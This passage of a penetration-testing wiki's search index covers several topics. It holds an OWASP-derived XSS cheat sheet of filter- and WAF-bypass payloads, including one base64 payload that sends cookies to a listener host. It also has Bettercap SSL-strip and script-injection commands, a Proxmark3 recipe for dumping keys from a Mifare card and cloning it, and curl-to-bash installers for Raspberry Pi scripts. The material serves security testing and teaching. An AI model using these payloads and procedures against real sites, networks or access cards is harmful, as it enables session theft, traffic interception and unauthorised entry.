", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#url-string-evasion", "title": "URL String Evasion", "text": "Assuming http://www.google.com/
is programmatically disallowed:
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#ip-versus-hostname", "title": "IP Versus Hostname", "text": "<a href=\"http://66.102.7.147/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#url-encoding", "title": "URL Encoding", "text": "<a href=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#dword-encoding", "title": "DWORD Encoding", "text": "Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details:
<a href=\"http://1113982867/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#hex-encoding", "title": "Hex Encoding", "text": "The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):
<a href=\"http://0x42.0x0000066.0x7.0x93/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#octal-encoding", "title": "Octal Encoding", "text": "Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:
<a href=\"http://0102.0146.0007.00000223/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#base64-encoding", "title": "Base64 Encoding", "text": "<img onload=\"eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#mixed-encoding", "title": "Mixed Encoding", "text": "Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:
<a\n href=\"h \ntt p://6 6.000146.0x7.147/\"\n >XSS</a\n>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#protocol-resolution-bypass", "title": "Protocol Resolution Bypass", "text": "//
translates to http://
which saves a few more bytes. This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like (ht|f)tp(s)?://
(thanks to Ozh for part of this one). You can also change the //
to \\\\\\\\
. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.
<a href=\"//www.google.com/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#google-feeling-lucky-part-1", "title": "Google \"feeling lucky\" part 1", "text": "Firefox uses Google's \"feeling lucky\" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's keyword:
protocol. You can concatenate several keywords by using something like the following keyword:XSS+RSnake
for instance. This no longer works within Firefox as of 2.0.
<a href=\"//google\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#google-feeling-lucky-part-2", "title": "Google \"feeling lucky\" part 2", "text": "This uses a very tiny trick that appears to work Firefox only, because of it's implementation of the \"feeling lucky\" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:
<a href=\"http://ha.ckers.org@google\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#google-feeling-lucky-part-3", "title": "Google \"feeling lucky\" part 3", "text": "This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the \"feeling lucky\" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case \"google\"):
<a href=\"http://google:ha.ckers.org\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#removing-cnames", "title": "Removing CNAMEs", "text": "When combined with the above URL, removing www.
will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):
<a href=\"http://google.com/\">XSS</a>\n
Extra dot for absolute DNS:
<a href=\"http://www.google.com./\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#javascript-link-location", "title": "JavaScript Link Location", "text": "<a href=\"javascript:document.location='http://www.google.com/'\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#content-replace-as-attack-vector", "title": "Content Replace as Attack Vector", "text": "Assuming http://www.google.com/
is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: java&\\#x09;script:
was converted into java script:
, which renders in IE, Netscape 8.1+ in secure site mode and Opera):
<a href=\"http://www.google.com/ogle.com/\">XSS</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#assisting-xss-with-http-parameter-pollution", "title": "Assisting XSS with HTTP Parameter Pollution", "text": "Assume a content sharing flow on a web site is implemented as below. There is a \"Content\" page which includes some content provided by users and this page also includes a link to \"Share\" page which enables a user choose their favorite social sharing platform to share it on. Developers HTML encoded the \"title\" parameter in the \"Content\" page to prevent against XSS but for some reasons they didn't URL encoded this parameter to prevent from HTTP Parameter Pollution. Finally they decide that since content_type's value is a constant and will always be integer, they didn't encode or validate the content_type in the \"Share\" page.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#content-page-source-code", "title": "Content Page Source Code", "text": "`a href=\"/Share?content_type=1&title=<%=Encode.forHtmlAttribute(untrusted content title)%>\">Share</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#share-page-source-code", "title": "Share Page Source Code", "text": "<script>\nvar contentType = <%=Request.getParameter(\"content_type\")%>;\nvar title = \"<%=Encode.forJavaScript(request.getParameter(\"title\"))%>\";\n...\n//some user agreement and sending to server logic might be here\n...\n</script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#content-page-output", "title": "Content Page Output", "text": "In this case if attacker set untrusted content title as \u201cThis is a regular title&content_type=1;alert(1)\u201d the link in \"Content\" page would be this:
<a href=\"/share?content_type=1&title=This is a regular title&content_type=1;alert(1)\">Share</a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#share-page-output", "title": "Share Page Output", "text": "And in share page output could be this:
<script>\nvar contentType = 1; alert(1);\nvar title = \"This is a regular title\";\n\u2026\n//some user agreement and sending to server logic might be here\n\u2026\n</script>\n
As a result, in this example the main flaw is trusting the content_type in the \"Share\" page without proper encoding or validation. HTTP Parameter Pollution could increase impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#character-escape-sequences", "title": "Character Escape Sequences", "text": "All the possible combinations of the character \"\\<\" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\\x3c
\\x3C
\\u003c
\\u003C
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#methods-to-bypass-waf-cross-site-scripting", "title": "Methods to Bypass WAF \u2013 Cross-Site Scripting", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#stored-xss", "title": "Stored XSS", "text": "If an attacker managed to push XSS through the filter, WAF wouldn\u2019t be able to prevent the attack conduction.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#reflected-xss-in-javascript", "title": "Reflected XSS in Javascript", "text": "Example: <script> ... setTimeout(\\\\\"writetitle()\\\\\",$\\_GET\\[xss\\]) ... </script>\nExploitation: /?xss=500); alert(document.cookie);//\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#dom-based-xss", "title": "DOM-based XSS", "text": "Example: <script> ... eval($\\_GET\\[xss\\]); ... </script>\nExploitation: /?xss=document.cookie\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xss-via-request-redirection", "title": "XSS via request Redirection", "text": " ...\nheader('Location: '.$_GET['param']);\n...\n
As well as:
..\nheader('Refresh: 0; URL='.$_GET['param']);\n...\n
This request will not pass through the WAF: /?param=<javascript:alert(document.cookie>)
This request will pass through the WAF and an XSS attack will be conducted in certain browsers. /?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#waf-bypass-strings-for-xss", "title": "WAF ByPass Strings for XSS", "text": " <Img src = x onerror = \"javascript: window.onerror = alert; throw XSS\">
<Video> <source onerror = \"javascript: alert (XSS)\">
<Input value = \"XSS\" type = text>
<applet code=\"javascript:confirm(document.cookie);\">
<isindex x=\"javascript:\" onmouseover=\"alert(XSS)\">
\"></SCRIPT>\u201d>\u2019><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
\"><img src=\"x:x\" onerror=\"alert(XSS)\">
\"><iframe src=\"javascript:alert(XSS)\">
<object data=\"javascript:alert(XSS)\">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=\"x:gif\" onerror=\"window['al\\u0065rt'](0)\"></img>
<iframe/src=\"data:text/html,<svg onload=alert(1)>\">
<meta content=\"
 1 
; JAVASCRIPT: alert(1)\" http-equiv=\"refresh\"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">
<iframe src=javascript:alert(document.location)>
<form><a href=\"javascript:\\u0061lert(1)\">X
</script><img/*%00/src=\"worksinchrome:prompt(1)\"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
On Mouse Over\u200b <img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript:alert(1)>CLICKME
<input/onmouseover=\"javaSCRIPT:confirm(1)\"
<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>
<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#filter-bypass-alert-obfuscation", "title": "Filter Bypass Alert Obfuscation", "text": " (alert)(1)
a=alert,a(1)
[1].find(alert)
top[\u201cal\u201d+\u201dert\u201d](1)
top[/al/.source+/ert/.source](1)
al\\u0065rt(1)
top[\u2018al\\145rt\u2019](1)
top[\u2018al\\x65rt\u2019](1)
top[8680439..toString(30)](1)
alert?.()
`${alert``}
` (The payload should include leading and trailing backticks.) (alert())
source: OWASP / www-community
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/", "title": "Bettercap 1.6.2 Installation", "text": "", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/#bettercap-162-installation", "title": "Bettercap 1.6.2 Installation", "text": "BetterCAP is a powerful, flexible, and portable tool created to perform various types of MITM attacks against a network
Bettercap 1.6.2 is a legacy tool, but it performs SSL strip much better than Bettercap 2.x
Install Ruby Gem
apt install -y ruby-full libpcap-dev\ngem update --system\ngem install bettercap\n
Bettercap 1.6.2 installs the executable to /usr/local/bin/bettercap
Bettercap 2.x installs the executable to /usr/bin/bettercap
Both Bettercap 1.6.2 and 2.x share the same executable name. In order to prevent any collisions we will rename the Bettercap 1.6.2 executable to bettercap1.6.2
.
mv /usr/local/bin/bettercap /usr/local/bin/bettercap1.6.2\n
From this point you can run bettercap1.6.2 for Bettercap 1.6.2
and bettercap for Bettercap 2.x
", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/#bettercap-162-ssl-strip-examples", "title": "Bettercap 1.6.2 SSL Strip Examples", "text": "Basic SSL Strip Example
bettercap1.6.2 -X -T 192.168.1.104 --proxy\n
SSL Strip With XSS Example
bettercap1.6.2 -X -T 192.168.3.104 --proxy --proxy-module injectjs --js-data \"<script>alert('SSL STRIP, Script Injection')</script>\"\n
", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/bettercap1.6.2/#dbug", "title": "Dbug", "text": "To find that Bettercap installation from ruby gems:
gem environment\n
the path should be under GEM PATHS, for example:
/var/lib/gems/2.7.0/gems/bettercap-1.6.2\n
", "tags": ["penetration-testing", "tools"]}, {"location": "penetration-testing/kali-linux/kali-linux/", "title": "Kali Linux", "text": "", "tags": ["penetration-testing", "kali-linux", "kali"]}, {"location": "penetration-testing/kali-linux/kali-linux/#minimal-headless-kali-linux-installation-works-for-cloud-vm-installation-no-gui", "title": "Minimal Headless Kali Linux installation - Works for Cloud VM Installation (NO GUI)", "text": "This is a simple guide to install Minimal Headless Kali Linux by converting a Debian Linux to Kali Linux distro without any unnecessary tools. Basically you install the tools you need.
Platforms Minimum Monthly Price DigitalOcean.com 5$ (This link provides 100$ for 60 days) First of all we will need a clean Debian Linux local or at any cloud provider with ssh access
Let's convert! We will install two packages which allow us to replace Debian's repo with the Kali repo
apt update\n
apt install -y gnupg gnupg2 wget\n
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add\n
rm -rf /etc/apt/sources.list\n
echo \"deb http://http.kali.org/kali kali-rolling main contrib non-free\" >> /etc/apt/sources.list\n
Now after we replaced the repo to Kali we need to install the Basic Kali Linux core
apt -y update\n
apt-cache search kali-linux\n
apt install -y kali-linux-core\n
apt-get -y update\n
apt-get -y dist-upgrade\n
apt-get -y autoremove\n
Reboot the server to complete the conversion process.
In order to test that you are using Kali Linux
uname -a\n
Or you can check the contents of the /etc/os-release
file for this Debian distribution. After we got our new Minimal Kali ready we need to clean up some of Debian's leftovers to finish
systemctl stop rpcbind.socket rpcbind smbd\n
systemctl disable rpcbind.socket rpcbind smbd\n
That's It, now we can install any package we need from Kali repo.
Here are some of my personal packages I use daily
apt update && apt install -y \\\ncurl wget git dnsutils whois net-tools htop locate telnet traceroute \\\ndirb wfuzz dirbuster enum4linux gobuster nbtscan nikto nmap \\\nonesixtyone oscanner smbclient fern-wifi-cracker crowbar smbmap \\\nsmtp-user-enum sslscan tnscmd10g whatweb snmpcheck wkhtmltopdf \\\nsipvicious seclists wordlists hydra bully netcat-openbsd netcat-traditional \\\nadb fastboot realtek-rtl88xxau-dkms docker docker-compose crunch \\\nwifite apktool apksigner zipalign default-jre default-jdk man-db \\\nscreenfetch xsltproc binwalk python3-pip zlib1g-dev python2.7-dev \\\nsubfinder chrony hcxtools libssl-dev hcxdumptool hashcat hash-identifier \\\nlibpcap-dev npm sqlmap wpscan exploitdb minicom screen hashid nfs-common\n
", "tags": ["penetration-testing", "kali-linux", "kali"]}, {"location": "penetration-testing/kali-linux/kali-linux/#fix-ssh-broken-pipe-in-kali", "title": "Fix SSH Broken Pipe in Kali", "text": "nano ~/.ssh/config\n
add this:
Host *\n IPQoS=throughput\n
", "tags": ["penetration-testing", "kali-linux", "kali"]}, {"location": "penetration-testing/kali-linux/links/", "title": "Links for Penetration Testing Tools", "text": "", "tags": ["pt", "tools"]}, {"location": "penetration-testing/kali-linux/links/#usefully-tools-for-pentesters", "title": "Usefully Tools for Pentesters", "text": "Links Description Eicar Files Files With Virus Signature Credit Card Generator PayPal Credit Card Generator - Login Required ipleak.net Displays Information About Your IP mxtoolbox Network Tools Related to DNS jwt.io Allows You to Decode, Verify and Generate Json Web Tokens DNS Dumpster Domain Research Tool That Can Discover Hosts Related to a Domain SSL-Lab Deep Analysis of The Configuration of any SSL Web Server GraphQLmap Engine to interact with a graphqlr endpoint for penetration-testing purposes.", "tags": ["pt", "tools"]}, {"location": "penetration-testing/kali-linux/metasploit/", "title": "Metasploit Framework", "text": "", "tags": ["pt", "tools", "metasploit"]}, {"location": "penetration-testing/kali-linux/metasploit/#installation", "title": "Installation", "text": "apt install -y metasploit-framework postgresql\n
systemctl enable postgresql\n
systemctl start postgresql\n
msfdb init\n
Start:
msfconsole\n
", "tags": ["pt", "tools", "metasploit"]}, {"location": "penetration-testing/kali-linux/wifite/", "title": "Wifite", "text": "Wifite is an automated wireless attack tool.
Wifite2 Github page
In order to perform wifi attacks you need a wifi card with Monitor Mode
and Frame Injection
like Realtek rtl8812au chipset.
Suggested Wifi Dongles
Alfa AWUS036ACH Alfa AC1900 1200Mbps USB WiFi Adapter Alfa AWUS036ACS ", "tags": ["pt", "tools", "wifi"]}, {"location": "penetration-testing/kali-linux/wifite/#install-in-kali", "title": "Install in kali", "text": "apt install wifite\n
", "tags": ["pt", "tools", "wifi"]}, {"location": "penetration-testing/kali-linux/wifite/#install-pyrit-for-wifite", "title": "Install Pyrit for Wifite", "text": "Pyrit Github page
Install dependencies
apt install python zlib openssl git\n
The Install
cd ~\ngit clone https://github.com/JPaulMora/Pyrit.git;\npip install psycopg2 scapy;\ncd Pyrit\npython setup.py clean;\npython setup.py build;\npython setup.py install;\nrm -rf ~/Pyrit\n
", "tags": ["pt", "tools", "wifi"]}, {"location": "penetration-testing/proxmark/about-proxmark/", "title": "About Proxmark3", "text": "The Proxmark is an RFID swiss-army tool, allowing for both high and low level interactions with the vast majority of RFID tags and systems world-wide.
There are a few Proxmark devices, and you can find them at the official website. I personally use the device in the picture above; you can get one at
Proxmark3 - Amazon Proxmark3 - Aliexpress it's cheap and suites my needs
The RFID tags I use are dual band tags 13.56MHz and 125KHz
RFID tags - Amazon RFID tags - Aliexpress Useful Links:
Official Proxmark Website Official Proxmark3 Github Repo Andprox - Android client ", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/cheatsheet/", "title": "Proxmark3 CheatSheet", "text": "", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/cheatsheet/#basics", "title": "Basics", "text": "Command Description hf search Identify High Frequency cards lf search Identify Low Frequency cards hw tune Measure antenna characteristics, LF/HF voltage should be around 20-45+ V hw version Check version hw status Check overall status", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/", "title": "Clone Mifare Classic 1K ISO14443A", "text": "", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/#read-mifare-iso14443a-basic-information", "title": "Read Mifare ISO14443A Basic Information", "text": "proxmark3> hf search\n
Which results in a response along the lines of:
#db# DownloadFPGA(len: 42096)\nUID : de 0f 3d cd\nATQA : 00 04\nSAK : 08 [2]\nTYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1\nproprietary non iso14443-4 card found, RATS not supported\nNo chinese magic backdoor command detected\nPrng detection: HARDENED (hardnested)\nValid ISO14443A Tag Found - Quiting Search\n
As we can see the output ISO14443A Tag Found
it's Mifare 1k
card.
This also shows us the UID de0f3dcd
of the card, which we\u2019ll need later.
", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/#find-and-extract-the-32-keys-from-the-mifare-iso14443a", "title": "Find and Extract the 32 Keys From The Mifare ISO14443A", "text": "From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used)
proxmark3> hf mf chk * ?\n
This should show us the key we require looking something like
No key specified, trying default keys\nchk default key[ 0] ffffffffffff\nchk default key[ 1] 000000000000\nchk default key[ 2] a0a1a2a3a4a5\nchk default key[ 3] b0b1b2b3b4b5\nchk default key[ 4] aabbccddeeff\nchk default key[ 5] 4d3a99c351dd\nchk default key[ 6] 1a982c7e459a\nchk default key[ 7] d3f7d3f7d3f7\nchk default key[ 8] 714c5c886e97\nchk default key[ 9] 587ee5f9350f\nchk default key[10] a0478cc39091\nchk default key[11] 533cb6c723f6\nchk default key[12] 8fd0a4f256e9\n--sector: 0, block: 3, key type:A, key count:13\nFound valid key:[ffffffffffff]\n...omitted for brevity...\n--sector:15, block: 63, key type:B, key count:13\nFound valid key:[ffffffffffff]\n
If you see Found valid key:[ffffffffffff]
This shows a key of ffffffffffff
, which we can plug into the next command, which dumps keys to file dumpkeys.bin
.
proxmark3> hf mf nested 1 0 A ffffffffffff d\n
If you see a table like this in the output without a valid key
|---|----------------|---|----------------|---|\n|sec|key A |res|key B |res|\n|---|----------------|---|----------------|---|\n|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |\n|001| ffffffffffff | 0 | ffffffffffff | 0 |\n|002| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |\n|003| ffffffffffff | 1 | ffffffffffff | 1 |\n|004| ffffffffffff | 1 | ffffffffffff | 1 |\n|005| ffffffffffff | 1 | ffffffffffff | 1 |\n|006| ffffffffffff | 1 | ffffffffffff | 0 |\n|007| ffffffffffff | 1 | ffffffffffff | 1 |\n|008| ffffffffffff | 1 | ffffffffffff | 1 |\n|009| ffffffffffff | 1 | ffffffffffff | 1 |\n|010| ffffffffffff | 1 | ffffffffffff | 1 |\n|011| ffffffffffff | 1 | ffffffffffff | 1 |\n|012| ffffffffffff | 1 | ffffffffffff | 1 |\n|013| ffffffffffff | 1 | ffffffffffff | 1 |\n|014| ffffffffffff | 1 | ffffffffffff | 1 |\n|015| ffffffffffff | 1 | ffffffffffff | 1 |\n|---|----------------|---|----------------|---|\n
In this case use 002
key like this
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d\n
Now you should be able to dump the contents of the 32 keys from the original card. This dumps data from the card into dumpdata.bin
proxmark3> hf mf dump\n
", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/proxmark/mifare-tags/#clone-mifare-iso14443a-using-the-dumped-keys", "title": "Clone Mifare ISO14443A Using The Dumped Keys", "text": "At this point we\u2019ve got everything we need from the card, we can take it off the reader.
To copy that data onto a new card, place the (Chinese backdoor) card on the Proxmark.
This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command
proxmark3> hf mf restore 1\n
Copy the UID of the original card de0f3dcd
proxmark3> hf mf csetuid de0f3dcd\n
We\u2019re done.
", "tags": ["pt", "tools", "rfid"]}, {"location": "penetration-testing/utilities/clickjacking/", "title": "Clickjacking Test Page", "text": " Full Screen Version
", "tags": ["pt", "tools", "clickjacking"]}, {"location": "penetration-testing/utilities/idd-generator/", "title": "IID Generator & Validator", "text": "", "tags": ["pt", "tools", "IID"]}, {"location": "penetration-testing/utilities/idd-generator/#description", "title": "Description", "text": "This is a simple Java Script tool to validate or generate a random Israel's ID number.
", "tags": ["pt", "tools", "IID"]}, {"location": "penetration-testing/utilities/idd-generator/#credit-sources", "title": "Credit & Sources", "text": "The code was built by Georgy Bunin and cloned from his repository. It was slightly modified to fit this website.
", "tags": ["pt", "tools", "IID"]}, {"location": "raspberry-pi/docker-raspberrypi/", "title": "Docker and Docker-compose on Raspberry Pi", "text": "", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#how-to-install-docker-on-raspberry-pi", "title": "How to install docker on Raspberry Pi", "text": "sudo apt install -y docker.io\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#runing-docker-as-root", "title": "Runing Docker as root", "text": "sudo usermod -aG docker pi\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#manage-docker-as-a-non-root-user", "title": "Manage Docker as a non-root user", "text": "The Docker daemon binds to a Unix socket instead of a TCP port. By default that Unix socket is owned by the user root and other users can only access it using sudo. The Docker daemon always runs as the root user.
If you don\u2019t want to preface the docker command with sudo, create a Unix group called docker and add users to it. When the Docker daemon starts, it creates a Unix socket accessible by members of the docker group.
Warning
The docker group grants privileges equivalent to the root user.
sudo groupadd docker\nsudo usermod -aG docker $USER\nnewgrp docker\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/docker-raspberrypi/#how-to-install-docker-compose-on-raspberry-pi", "title": "How to install docker-compose on Raspberry Pi", "text": "sudo apt install docker-compose\n
", "tags": ["docker", "raspberry-pi", "docker-compose"]}, {"location": "raspberry-pi/external-power-button/", "title": "External Power Button For Raspberry Pi", "text": "Python script to control Raspberry Pi with external power button - Wake/Power Off/Restart(Double Press)
Official Github Repo
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#raspberry-pi-power-button-wakepower-offrestartdouble-press", "title": "Raspberry Pi Power Button - Wake/Power Off/Restart(Double Press)", "text": "", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#information", "title": "Information", "text": "When Raspberry Pi is powered off, shortening GPIO3 (Pin 5) to ground will wake the Raspberry Pi.
This script uses pin GPIO3(5), Ground(6) with momentary button.
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#requirements", "title": "Requirements", "text": " Can be install via apt
sudo apt install python3-gpiozero\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#install", "title": "Install", "text": "This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/install.sh | bash\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#uninstall", "title": "Uninstall", "text": "curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/uninstall.sh | bash\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#default-behavior", "title": "Default Behavior", "text": "Button Press (Raspberry Pi is ON) Behavior Single Nothing Double Reboot Long press and releases (above 3 seconds) Power off Button Press (Raspberry Pi is OFF) Behavior Single Power On", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/external-power-button/#check-if-service-is-running", "title": "Check if service is running", "text": "sudo systemctl status power_button.service\n
", "tags": ["raspberry-pi"]}, {"location": "raspberry-pi/motion-sensor-display-control/", "title": "Motion Sensor Display Control", "text": "Python script to control connected display to Raspberry Pi using Motion Sensor (pir).
Official Github Repo
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#information", "title": "Information", "text": "This script uses pin GPIO4(7) to read data from Motion (PIR) Sensor, Any 5v and ground for PIR Sensor
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#requirements", "title": "Requirements", "text": " Can be install via apt
sudo apt install python3-gpiozero\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#install", "title": "Install", "text": "This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/install.sh | bash\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#uninstall", "title": "Uninstall", "text": "curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/uninstall.sh | bash\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#default-behavior", "title": "Default Behavior", "text": "Condition Behavior Motion while display is off Turns on display for 60 sec Motion while display is on Resets the timer for another 60 sec No motion > 60 sec Turns off the display", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#config", "title": "Config", "text": "File
/usr/local/bin/motion-display-control.py\n
You can change Data Pin of the PIR Sensor at gpio_pin value You can change Delay at display_delay value
Line
motion = Motion(gpio_pin=4, display_delay=60, verbose=False)\n
Restart the service to apply changes
sudo systemctl restart motion-display-control.service\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#debug", "title": "Debug", "text": "In order to allow verbose debug change the following
File
/usr/local/bin/motion-display-control.py\n
Line
Set verbose value to True
motion = Motion(gpio_pin=4, display_delay=60, verbose=True)\n
Restart the service to apply changes
sudo systemctl restart motion-display-control.service\n
", "tags": ["raspberry-pi", "motion-sensor", "automation"]}, {"location": "raspberry-pi/motion-sensor-display-control/#check-if-service-is-running", "title": "Check if service is running", "text": "sudo systemctl status motion-display-control.service\n
